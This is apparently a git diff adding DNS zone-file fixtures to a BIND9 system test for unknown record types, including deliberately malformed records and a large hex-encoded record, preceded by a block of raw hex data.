A89AE11EB4D138A55EE22B439F502A4DF61651093E5D04BD28BE75BF 478FB5334D09734E4B48F9513B9ED8C1FA8E106C6B7E94320180D2C6 54B980AB947196031767F8025FF010A7250F67A8D93DC7F63C6AB6B6 60CE02510BF2BA6941659908B652893E815FB6FA2C72D8EF3A904060 D42C1F9EFF2AE64419C27DCA97ECF0C5B010CE43D52F8C31834B31F3 34F94A0D518094863818BAEAB173BB6C9127F71A4A9AF53D2ADE3909 EC0ED6288E4ECD27CC3311310641BE7CB70F9B6FFAD9C7357A62B083 41405956EBA3993FA674E27EF91629BA13B6274AC0DBCB3DED211049 F3AB6E9ECE59D25447EDF778E58139A53A2504B0B6FB533EA8A7BE6E AF359931824C34FBF6CD37BEFAB71E08FC1258D1052799A61AAD78EE 35BBAA678CD9BE1BDCB9FD33F0858E184801E0E4E3E83D1B27306C2A B83BAF84AE69F658CA1BB27D9DA9B4E7AE629904F2E0EEFFE412BEF2 6835F0187EE5FB4304FDDDA0C1E8A21D8F75C37ACD5653D38C3E8627 9B87B44D22FB02B94308E0A1C9E92531EAE8AFCE9D514DD9969393B2 DCC52FE19F63D084162BA59FED448967C7E29006C0B1C9BD64D2E8C5 99F2F1A349B9F307C7EF9B220E63DE6AD31146D375BC074F12CC2E6E 6B611245C646D2CB2EF942D35CE8531DB705C55ABCFCB643E5D7B292 E8A332046064C08D05907016BFADE7333C0B5A9FEBD89691DCCB5096 8F464E8C965A4FEDCD5EC65C3D3625D31D7B414DAA07C4F5A38DAEEF C3F8FE066437B3DED8B7CBE2C15A5CD206B49FC82C34FDC18DAC0CCB D1057C7CF48827D588436BFD052E3067B6AC107B38DC267C25337072 6B0DB7ADEDE25F020C67AE7F16456C7A2AF72DC04A9D3FF9E4EBE252 3A1A788124391C6A7E3CAEC8C73EB68A7B5AFA01C3A2E38822B7BD1F 13C1B7EC236507596B10DA999748F66083C6870B14FA6B241805E16A B6516C52D0F411FAD563ED69B57A063D77936ED323372A1207F7524E 568F6CDBB71091010FB5383E998D3880177096C61EB1A23E16FA2BA9 D6DCC4C7D1765A3121301A7B2D68760BF90FA28C9962B8E35DAB7F54 FC5FA641E6C7C07805F811F6DF136E4842CF7D4AE0335C8C6930CBDE 32BBF68C4C05A75FC4548CC51FDBD977523EEA8D69A80D7120790E59 FFB6396A8A6DB4878B4E3E3FE2190159B50E2EF57028EC77360BE8FD 0325CE6AF2A0A664FBBE8EC64B90774A61E259F753B053ECD2E3F9CE 4F195CDEE748A7D56B7245A2CA7B7998FE7C9B36BDE4DCBB616A7796 8455F11F042D6D9E5912638F53534AF82568A6BE645B37A5D00A0EEF 9723908344B2796E5260BEAC9187D5003AAFC09A22FAEF40DD64C889 361D1869DFA590FD4A067E1B34C88130CCDDF3FEEE45C4152BE43609 1E3280D2DF5BF218E1A19C6258999B0EAB850674EC5EBAD5EEE1D93B 691E7CEFCD5194D5534BA2EF91D9556219F5A08A07903B3F165707A9 87C13C4C673B28044D1C76647643C0D9EE4EA5A9CA661E783C3CD109 5E407171F4F71E40C14BCFBA4FDD990A31B1109E242DF74A20A89567 3A59F17E205D889AF060CCF5850AD21AD777FE8E25DB82F189CDA7F4 383085A35E95E4A97249DA56D87B7F54757D785437207C5469784CE2 C5A4EAECF0CDB56AF6A8952CD3118436B794182B0ACBE17A89A5B6B0 CB7D0CB848CFFE629FA3A6A55FFB9E8822725F89CA7A868545EB6B56 88137188786D631D06ADA4BB04AD456680CB6BD0215E5BD9AA06CEF9 DECF71BD1F4837DE157A0E7AC0C46BD8C1D48FD75B48456B45EEEE62 9C74DEBF39FBB251C578AF9FAC00C2A966398037DF7C580EB3F8A00B 46C4FDD3B28DC259DE09199805E15F7C822677FCAD0891DDF9A292D4 18F92FEBB18D5EF999CAA77AF84A47A5F4A3EE4B1065E627FD6A0545 3E0FB914E33118D34CA9B1E25D0182561DB7A7C8F3B1C7DDA03CE434 2298629955C91095E6925E467C8567F4520FDBC986E64F62D7C154C6 D3BD0444141F0EC5A872D6D7190E1171C476C80B2E3B9FADE59C4152 01C284D73548C1F099F25A43FB4E14834C75D71AAD5038C8C2448ECE E85E535405374ACCEC5B2871276E064A73702DE4916D7B784906AF99 6757285CBB4AEECC25C9438787342DF987F16727069C72218C84E2C9 A1CE2C5F2BB46E340AEBB265EBEFACFC1A99450E3474F8D2CC14A561 7985CFC1C70ABA028E347BD7BE0C5403675310263AFD2AB8CC006FEB 487FD77FF73BF03B84E962D4E9E0C24F6EFB6B045423F129E0525C54 AA0663C34524008F3A2F06BA6DEA62CC763523241FA5FD9390047327 327FBE08F8F2D0E89E1083BB44973AD5C05AC887DA1F635111B00113 76BCCD217EEB2DC3BC569F735134502B9ED72086DFBBB91EE58A102F 8568BF10110D447C5C68771385BB14A56B7865B1626DAC4B8C60C17B F147A85759E4873FDC0256F6564E160C9225CAF60DC187EA2AE2D400 1C12015F714740421221C79C10E56CDA4B98D7B721D15E545E78F663 714EF95A021758AAFA31C53E6EA9AB928ACF55E3A0BF9B49D1F991E6 AC876DDEA607AC91B632EEF4840C34CE7777A8B73883B6864AB51D8C 9A800187E9B12FBE393EF861577E0BE5EA12403DDD202A7D2E080AC6 D24867636BC7106B01AF7829306CBC3A636F83DA0D5782F038D194E7 96A892B1B07519B4833E3FCC62188098BD7B3F9F797F1A716EFA8208 AB2A034CC2F247D957F17FCAD307A3E907C6284B9FF894D1A960CF63 5605D78FE922BB989FCBF105C93CC5914D4348475A55C8410B1DD68B 071983957FAE7B23C8566DE5DE0C79F50BCB172430640355935E8545 1507F0CED1BAF985BE8E87EFA7ADD72CEC928E089A4A6BA917991FA5 40F4B68B66BD12F298FF9F15998747077E83CEFAAED6E9ED08A334C8 0DBECEDAE9AD779163391F7AAD751BA7B502DE9A29F6390E1C05B829 D707263FD876D1A5D6B8052FE5661049143F6CCD6BA0868803C5D3F0 0B94D205FDBF1FB0E52B492EAA2DAC0C14F891D4CA89D16CAA89D7AA 3355BB4E94CD8379C0BE5E471CD95806E0B6D546B3816043D3B3808F AC478B385AFD3E3A74A50D38EFA321FA284C43510CA8C10C8A846305 ED11AB5A17C182054BBA8ADBFC2DF6F17C519A48E51006BAFAC393EA F639CA163B250EF7DF36ACD69FC99EE7B1954E9D489C445F0C7393CC ABBE4ED82CFE017354FF2F69C60C9C50DE37BD436B9E4D04FC49096B 00425741F9F9361F5A5C89D3864AC5D3C8334689E8E317BDADD81BE8 72F1A8EF614AE5745375E29EC1A0E2E28787AC2A2A1786AC320C66D5 791BD00CFAEF79198EE1B405F5EB918939C63FB459488827E2990995 9E573389AB21F4A02065A3BC0ECFA0032A298039DD0F21E1951358BA 8D655732FC940E1354B1C9735D79DD788180ED99CC2238297A780267 A5BF4DB254B72F03FFDD87B1E1876B956C118194B207BF273FC6D99C 8631D598FB39903CAE7E90B617ED8CD9FB3C27D73FE5376340FE7C01 218C2A15A5FA4D430F877E005D07C9BC69D162A7B0276F770DB00F06 2ADC72F329A82A5E6BB170499FDB50161EC4E8CEB8FB2A0320721DB0 D210A1F72CD1C6AD9FA8FFB5C85066808D7C88500B30EFF0E05409DE 770839F628EB52AAE627AA8E9A549EBB577C2BD90288769CA026B379 0FD2048AA97FC32B5D14D528EA90CEB4518E54ED54985CA47804BF17 337FECE08B14F4BE3456D74546386D894AA471EA164CAB9B3261D92E 5ED63C61C106545CA8247F0FCB2B01284305DFE546EDD070DBFEF2CF 4DB93E508D8802DB86557AE42FC48FDC914B4A0D9483B4880BAEFFC6 1C34A5D48322CFDFCAE7AC726DCF55724750D033517AD00CE13D19A0 39418DF8A23A05283336B598B84E7D131D9E51ECF00FACA8398DE34E B8422F18F149FEA650C07FF3E95D33C4774936C56906003D8CB1EF75 52A0B27723A77EACB1F1A6D0E5B9AD3327BE8E168FAEA2B438BE2062 BC182E74A6117E703E98D9AA2A0D771000A241B065D03A1E2630D557 879928A7B68B8A287FADEC4FCF8CCD091DC034657E08FFCABA224D72 0B2929EA5A8A84966E4C4A2CB322F8A9D5378914C9400178ED00B79C 4A53ADF4FC5EDFB66E6E61E1A3277A0D92914A16AF328585F360216C 6D3514D2EFA1A710F68B442FA035ED78F57BB3949A4D159DBBCBEE5C C734B4F1F17E04E70674F192F079D5270F1F19B53EF2CFED9DE81D6B 7D1AA9F8E3ED8800B45ED4A3A110DF60BF6D0C26891BE05378F214DE F3FB68C937977A8E91DFF2AF6C33D5264514A9401ED00D47D8B2173F 7FE12BE2433359E9C1E455B69405F84D397CE89ECF41598C34EC2D2C 15326FCA242F48EDB6741E8A9AEE351F449C05697B8005AEEA6679CD EEF281CA22A32CEA717A769AF48FF7E3A46A9796B86C5C5FFD71449D 42A46D890AB3696005C0132EFDC24D97E6C78AF550A3E0C475E8F4EC C69C9E8DA9BA494A0EADDF1ADAA5606287400772BB205EE5216E8125 02993DE510A88DB1B12884BB83020DC5372097E1E9C323AD2EE0D811 E4C6161E086F471D1CD0E5DAD9657145C620F78EDF98DC4EDABAF82A CDD472FB7251F17FC354C824882AC8529AEE91836A80B89EFD006D23 4F5CFA9E486317CA6433457937EC50B6C1EFDF55B0776D29B8C36F70 67ECEA41D62B7E57D7C2C12FEAFF83380CB96423AFA0BA51DA333FEE DF3969F7E6095893E99714D55409F266D85EDDA8A6677F319EED020F 20CE41A03337D42A1C1FCE7C26C951A6C8B128343375E3BF99969188 E0AAA485749DD92FE14CE8882B3B4CDA3C7E7FBC08702407F057C9C2 AE0EC540E553ADC118D9AFD51AEF7303C3A128D01E432D292FB1510A 29979E4028A7F02869397C73B571FA3F84A09A9CB70CC52C36CEC79D 3D5331113594F1C842E75C87C0A79A745AD2B26F7B673CB57790B0B0 734E399AA0A835F3FF711F45BFF3CF6B97CDB74A5A1B53F9CDC0547F 04C5076D20B178AB4D01465D9B96E23C28A269A4786FA7C33FFFCFCD AB07B8CD88E7AA3CB670D9301D535FB42ECF9B85B0D8A7431A2CB123 7F2899AF67E1CF09819E01E1CBB2EDAB0CD1AE2FC6E07E7B194EE18F 8821D144DCCC49D0550E6AFE464FDC7ED36903AB42A2BFDAEE5FAF95 B909742E3F30D567D09B928A61E23B30970E8AEF268FD27CC1A76BAE 51E95EBA7A04CC574DB34127F41F48AD0F60F3CB522DE070B533C0B0 060275E300D767B7F767C4AA3FA465DC24B84F2CFD8AD4A61038D225 CA4DC038201C8D094EA1B9443338A351D9BC43FA73059EB3C2C173A5 647046441DC3AD6F71FE1A37E90095B6D1799E5D749E1953417477B0 70A2465EFBED1A5267A9AA4EC2FD10B609039690FBCF9EA57E875803 1BCE78B8ADF94C539753E35DE5E8E300A527E7EC9C04E3B6E7E56F86 F32400B25895C90AD3E03CA49226548F6808A70081CD75D99BB561DA 5390F2D3418C4079311549F89E7E4E6539AC904756A7557DE633C817 9DF1B9B98C8AC5763C3854EE0743EF600BBB4F698FAC7982B5944E81 DE5B84903DE5D692E00A390291A4FD85E6080CEE16B5AC1DC70348F4 F037F7C3A87E003AF3ECBB184AD9E8F0802E66748E3CBAA73D286424 2278A7C12F5A741FA4A2BDD65302DDB14DC2F466FF960082E4281593 22115FDAE1F8022CBB1F58DF88CC724FCE517512F87BCF4DD7EB1BD5 DDA30BAAE2CDDFE95059F19680C51089F4EFFB3C6B8BC66CBB5B9157 4D352DB346C260BA58BBD6C1EA29EBE4D03335B3E7B34B2DA5AE1C69 CEBC4DB7822752AC827AF8934C9EFF227B72844626BB97ADCFE1DD7A 4407320C3D81C136759F5DF02FB50719B5D7078F15CBD37D25A2F9C3 88E98EA4D33CDA3977A886B97D607B2FF1D564E2B9D6A044B40FB5EB F0B46ED087287F9FA0A9D4382C98965004011815EFCC28ECD159D68A D96932A35FDEA0EFE3CEB317CC537A55E7464B066A6FDA767F872EA0 2C12FF8C89686236273BA562E4EC6FCF0E166190814DBC08DD30654A 84DB902FCBFBDA00C09BB4EF56A3A54139FB230618426675D6661866 EF870E26DAA0F275E5C680EA4B8AA5CC048D1F4C93CE3A28ED6D2B67 5336CB20A00FF06AD6CF40ED779B93E3BCB71227BFB374F58C96D69A 874008D82295316EBD6394DAFC393922DE1719DAE26A1A309CC42065 35C88A55DA7C4A0F7CFA29A9D0F21BB9DC4D8448FCB5D807D3700276 9FD786525FC5F365E2EC2DACEA3287F0D203B3DF87A3CB09562FCB8B 45BB6AC955FF94C4B72F3B18F0DF78648B5A339A0BCCBEB35D8E5BD9 CF58D1D77E957790F18E2BF6018E32080BCA6BD34EFEC9760518C9E6 5416DBD9EC0E7D9F242892FC45B66E862298FBAB0D1855B762D1C505 072D06FAB0FA99CC518D8830E6FA0AEF5977E116606874DFEF1756ED 555798DAAA3FE8078A19E892B94DB166BA6A99C63C79F1F62AF6A319 601CC304CA52A8883ECFC3647C069B832169D91BCE1145995B514CA7 3D70EDC34A3887E5217279251946241447B7AAC95DDE21FAF82AC2C0 44B0013E7577877A8ED5320F8E874058D96EAAC621566A0994D762EA 58C9A3A9029645273D27AF538215B3CF672FAB49838D87CAAB2A91C9 B80E8E80306F73143A00D6AF61037D196E593D585892835BF6B87ECE 1EF5D439780BEB20CB674F5B885CC368EBAFF8D4BA43BCA4962A09D6 DCB771BAEF7E3DF9 diff --git a/bin/tests/system/unknown/ns1/broken1.db b/bin/tests/system/unknown/ns1/broken1.db new file mode 100644 index 0000000..cee3832 --- /dev/null +++ b/bin/tests/system/unknown/ns1/broken1.db @@ -0,0 +1,23 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ SOA mname1. . ( + 2000062101 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.1 + +a A \# 5 0A000001 diff --git a/bin/tests/system/unknown/ns1/broken2.db b/bin/tests/system/unknown/ns1/broken2.db new file mode 100644 index 0000000..b06ce83 --- /dev/null +++ b/bin/tests/system/unknown/ns1/broken2.db @@ -0,0 +1,23 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ SOA mname1. . ( + 2000062101 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.1 + +a A \# 4 0A00000100 diff --git a/bin/tests/system/unknown/ns1/broken3.db b/bin/tests/system/unknown/ns1/broken3.db new file mode 100644 index 0000000..24c0aed --- /dev/null +++ b/bin/tests/system/unknown/ns1/broken3.db @@ -0,0 +1,23 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ SOA mname1. . ( + 2000062101 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.1 + +a A \# 5 0A00000100 diff --git a/bin/tests/system/unknown/ns1/broken4.db b/bin/tests/system/unknown/ns1/broken4.db new file mode 100644 index 0000000..448bc4b --- /dev/null +++ b/bin/tests/system/unknown/ns1/broken4.db @@ -0,0 +1,23 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ SOA mname1. . ( + 2000062101 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.1 + +soa SOA \# 32 026E73013300 04726F6F74C4 00000001 00000001 00000001 00000001 00000001 diff --git a/bin/tests/system/unknown/ns1/broken5.db b/bin/tests/system/unknown/ns1/broken5.db new file mode 100644 index 0000000..b868a6c --- /dev/null +++ b/bin/tests/system/unknown/ns1/broken5.db @@ -0,0 +1,23 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ SOA mname1. . ( + 2000062101 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.1 + +any TYPE255 \# 2 AB CD diff --git a/bin/tests/system/unknown/ns1/class10.hints b/bin/tests/system/unknown/ns1/class10.hints new file mode 100644 index 0000000..cf78245 --- /dev/null +++ b/bin/tests/system/unknown/ns1/class10.hints @@ -0,0 +1,13 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 3600 +. NS ns. diff --git a/bin/tests/system/unknown/ns1/example-class10.db b/bin/tests/system/unknown/ns1/example-class10.db new file mode 100644 index 0000000..ba69aad --- /dev/null +++ b/bin/tests/system/unknown/ns1/example-class10.db @@ -0,0 +1,31 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ SOA mname1. . ( + 2000062101 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns + +a1 A \# 4 0A000001 +a2 CLASS10 A \# 4 0A000001 + +txt1 TXT \# 6 0568656C6C6F +txt2 TXT "hello" +txt3 CLASS10 TXT \# 6 0568656C6C6F +txt4 CLASS10 TXT "hello" + +unk1 TYPE123 \# 1 00 +unk2 CLASS10 TYPE123 \# 1 00 diff --git a/bin/tests/system/unknown/ns1/example-in.db b/bin/tests/system/unknown/ns1/example-in.db new file mode 100644 index 0000000..9b4b8ec --- /dev/null +++ b/bin/tests/system/unknown/ns1/example-in.db @@ -0,0 +1,56 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ SOA mname1. . ( + 2000062101 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.1 + +a1 A \# 4 0A000001 +a2 A \# 4 0A 00 00 01 +a3 CLASS1 A 10.0.0.1 +a4 CLASS1 A \# 4 0A000001 +a5 TYPE1 10.0.0.1 +a6 TYPE1 \# 4 0A000001 +a7 CLASS1 TYPE1 10.0.0.1 +a8 CLASS1 TYPE1 \# 4 0A000001 +a9 IN TYPE1 10.0.0.1 +a10 IN TYPE1 \# 4 0A000001 +a11 IN TYPE1 \# 4 0a000001 +a12 IN A \# 4 0A000001 + +null IN NULL \# 1 00 +empty IN NULL \# 0 +empty IN TYPE124 \# 0 + +emptyplus IN TYPE125 \# 0 +emptyplus IN TYPE125 \# 1 11 + +txt1 IN TXT "hello" +txt2 CLASS1 TXT "hello" +txt3 IN TYPE16 "hello" +txt4 CLASS1 TYPE16 "hello" +txt5 TXT \# 6 0568656C6C6F +txt6 TYPE16 \# 6 0568656C6C6F +txt7 IN TXT \# 6 0568656C6C6F +txt8 IN TXT "\#" 2 0145 +txt9 IN TXT \# text + +unk1 TYPE123 \# 1 00 +unk2 CLASS1 TYPE123 \# 1 00 +unk3 IN TYPE123 \# 1 00 +$INCLUDE large.db diff --git a/bin/tests/system/unknown/ns1/large.db b/bin/tests/system/unknown/ns1/large.db new file mode 100644 index 0000000..ada9930 --- /dev/null +++ b/bin/tests/system/unknown/ns1/large.db @@ -0,0 +1,3011 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +large IN TYPE45234 \# 48000 ( 45841674994e4f5e4ba43aada754d631 + dfb7e12155e7f10c551032b3e56ed5ba + 5136c15cda201e7e5e54fb60a99388b6 + 1a565c1cf74cd8aae1aee7fbeb54cebe + e065cf2b1b317f67277ae733183c668b + a81a7efec322d36fb5cc6293ad7f7ae3 + 544a7c64d404c4eeb1b889e9780a213b + d548a018be2e1b6a3b8840d714ddb8c0 + a66beaa4c2a1471d216ad0eb8d2c8849 + 60d30fd3fad058c47eace42aab0f0d40 + a690ca3baf9616b7373b889788e89175 + 7ae0eeaccd291d87d05daed8631d1ebf + 9202f81659754ca11221e902a69c7bf0 + 039310edf5305ace5404ddd02163be0a + 22334879a27bfa7702e13d06f1588726 + 1a12abfd0c01966fa67f97ed38c521db + cff8a2aa8daf53f1eaa7991b6767da0e + 68b2ebb38beb8f1aadaa30c1185870da + d0091e7af0bbed453ce081ba5dc87ca5 + a764592ed7312c6a26f7e358ef35182a + 49763a61c9a0c5dbddcf199251381215 + 51eb3c3ced9f529f03a85429f42f7550 + 3efa6e1301aa7ad9b29c5aaaa1ef6ee5 + bbe9e2639d65baf98a6b06243483a245 + 3969f65f9a0dad3d8630522079b8c107 + 9e28057d63696739b71f57ee85ab20a5 + 96865d77ef70412c7a4be7d9d5a4eb13 + 709f0ec1af6a4cf962364761ebd62efb + 4f16ee843c1b214944eff2c81563c4ac + 4c854c32972df761f17fdcac3e40e027 + 57fdf1fa57f77e1c86c3d488b02d4634 + 501801be4f929ffde0ed07112093d901 + 8d59cee1733bfdc8a968a831d42b95c0 + 87a578e3c6eefacfa1c9089072ab490d + 631b2d00cb75cb33586917f103842856 + ca2f5ccd449465b4a86a37f8147d6269 + 69f02dafacd4ba81b680e5dc288037ad + a3be902e2ef9c129710200ac93f5d3bf + 1c1418b65d98bdf101d38d9b2c5f25a3 + d09a4638dcc2c0d0cf411f3ed747e674 + 5ac7a8be03ea2ee990979cf3b8398c4b + fb058012de25fbf0e1081c4205afc54d + 3bda63565bc0bc3f6af91f083abc26ac + 7047e2759f28525498ae6461a1f66b90 + 0fde5d8cd6c842c587f28620444ad5bd + 3b522f0294c14e2279b5c577f3f41c15 + a723a20259805aa18360f6b954b75d98 + beecd0c0a0ad151b0027cca891932adf + ca9b7eca33fd585031c188f8d851e3bb + c8552f340e1319553bfe776975baee6a + cf025b8c4849c0a430049734114b7534 + 5228d19846b39580f1c328068a4b36c4 + 3ef13380be7e54060acd9494ee99908f + 57e779a4c20728135d509b52d5066cc7 + bac77f1c4fcf81e9f0c7cf621593e90f + 398c56b14fddc74f62a4854655cb27b1 + dc94a83f9a4a52055ea74ea3129f88cb + 8d01870bfd5157cb966cfa4121e018c2 + dd72f363dfa5011d1072fd9350dde79b + ec213520cd68ccea356ee24b2c3e8487 + 1540c410353e9514188a46771b07b2b0 + e261287d353a8d55a71077b4b509fb99 + c80d7d07f6739cbc9ed82a5a40e624c0 + 860a42049585c0abc164b6e5e726da58 + b6faf8384e0c8e9a03bae074415335ba + c4e72aad561cb77a8d7aad25c67f3d74 + f38b62f43a2012fbe62c0def6be94809 + 8dbcbb0f06769663b8e6a7c0d88ac914 + dbb8baa785f4509b2decad57f85516d2 + aef23a24202b4123f4ce41e97653b5f3 + 8e7e092c8ebfdc36a46d204237ae7148 + 4f4249740c2eca7beace1699ccaac0da + a6ad8c1a0c5aeb59086c2179a235085d + 0c68942c8fbd67ec7fcf627049df4790 + 757f40d7d027fbeae4a358edd5867c7f + 5671046038e3086d76d3e22f868dbe60 + c64eb123bbf15358fd7d5b6511cedecf + a701494b143f77f7463d8e3099b811e8 + ab53092b3ef6e995a655086bcf61eb77 + 3900d425132a04530befc404f5bc27d9 + 8dd2367bb815580f8bb7cbef47936806 + 48959a44a6cd216196a4bd61d1cc4432 + 6869877e2be943c6c7bb95b854117b1a + 0b00d33083afe54461024bd791b2724b + ed82edd289f9376c7e0502627e1e3672 + 345dc53f1f25afb60568ca28c84b9214 + d32fb5d805cdd31324640519c3dd0b65 + 19fa93ab15d734fc0c5abbfa90c910c9 + 0c3f38b0688b584b6285427f760414c9 + 445b415fe433908035081f5ca081ab53 + cc7c2701f65a18a5e64eba887bad3343 + 2735c1e62ad2b35f0a258892d919835d + fa523e2bac6ddebdc0c576401f21d937 + 711d774153a7ec42125d24d115240fad + b90fe0061d9ec041ef2905e4aa3e81c4 + 53572df0f72a43d070492261dcad2817 + 4f8b16979db03c2f96d9e53cbfef510a + 1bb5d6cfbc4f92a9e94c0c018738e2a9 + 30922603083124284b076fc1f93afb20 + 878ccf756c8de07dc6d01c273ff26081 + 36a8dce64ba4287cc19e35b72b40a32b + 435f3bfbe94a97f0972aebb4c54d95f4 + 993eb831307d22647a1eb7c525fd470f + b9ca13d3404ca5ecff99e87b73c5b88f + d4a905220db8d183c325e7d27a4d70f7 + 1469ed347ab68a9f7f1a5ea235bcd9f9 + bbbef91a9df227109d715941f54ea464 + c9f8a9d0724bd4c9772023b086bd521c + 516449c780500cb33630ae28cf02c19c + 0958faee545b953ca46217b7ad600679 + acd85dcfeccf4012aa9d5a7e1a1b1a43 + c7d9a91f8766ed3a5ef61a7a0840bee2 + b8eeccd5932cb1438a7aa271ce6906bd + c3d9230ab8d0b095be53869b37455d0b + ac413f518e39767f23fc669aa0742b8b + 5196fedd1284c27d05372f4653618962 + 468ae24a6c575daea152d036619adb96 + 5487d0631b6182a0ebdd5aac519abbc1 + cbe766283788e8fce8ce91760edb4cda + c1636de694364fed377b9dd5512bb258 + ff28533ca454ee161e69a58f7964a88a + fafe768340ed78896d02fcc6d0009072 + 8c86c3c21cf4b89eeb975e2a674b64da + 5bc5d05f6d647252e7b3394031bc9b45 + 65c466e5d9b8d9c2dd96a9950ae0d879 + bfd8c343709968f0d4a885d9c0a4ad22 + b08fa3cb093dcd583afd49966cb842f3 + e739fc665ae78550914896a2d8f66072 + 6e02b7847afaf327990a3478362c091f + 2b0bf7dd8afd4f935141e63c7c4a680b + b02bf84ba0e2fbce5fcacf1cd51c7732 + e97a358dbff58dc07ae2cfc5f66ef5a8 + 532f31bfcfa86886751ecfe4d3234c3e + c84eabcb9de56bd72847e894ac95103f + eb7de2c89780e7377ed61a1bd813f649 + 57419bd798632aa7b5a43d5e90463fe5 + db8373a91487e71ab990c0b68c4f8630 + 5a3cb78216c98188d9c4ff715d7cc72b + d4b64253b4a894b2b9a3f7aa6c41a1ed + 2a7cc3553c3716c6d3ca42e4746a1801 + 93ff49e0b8063412ef9df6217c97d30f + b7ecc5abacf22e08105b0b09807b3f3c + df66a695f46f5ace7fff41208859ca38 + 610f6a91368685c9ef8e68958acab3c7 + f198a484acd6592cdd0f1507af662a61 + e9fe8eb40efeebed64888802978952dd + 21c9d903b2be0845c3611a138c2750b1 + 35d0d55fae5ae23a8274da034e28d2b7 + 760f82ab2f83ab1cd34d9c45f7fb6352 + 7845704a4e68cf578c8604f269f70db8 + f4462980eeaaa40ac20076fdddfa2f2f + 31ae7e031388ed6bcbf0da39fd210351 + c956151c5a69b8db3ecba80b6da822a8 + 58e8d5abc24d3afbade4b8fac50cd36f + 3926af3cc6917d2a54a83540bbc96eca + dbcdba189849b07b865538b3b4fe142d + 2dfc0dec688da44b3c0b8c4605a00cc8 + 26bd5826a8e43f225e75d246de2c8963 + 94ac9169746689010f2e958029f874a0 + 84813663bf14a38111685457842be856 + 6c634fe7bd34a0846b82929dc357f06b + a186a3a6917521881a1b84473b9d6be8 + c10dda27655bcef81ac6e717cca29e9e + 0f6a02578b7a6f97cec7b600785c4ace + 6eafe9f7f604f7540538f96501467456 + bf132d1f52555de292c21e3aa5fc24cd + 57e2a65e742e2fec311f3cbd19b9b4f8 + e9c5a66191f4c19b8f641d9c7fa58338 + f179b533dcbf6a88849e4bd01b094b5b + 8b09bbf3095f683029dfa61a4c91a582 + df0380aa4a0abc97a7ba9735bc7c2894 + ae6883b42cdca772626c31088c1684f6 + 4dea810199c2d48a5467db001ba4e274 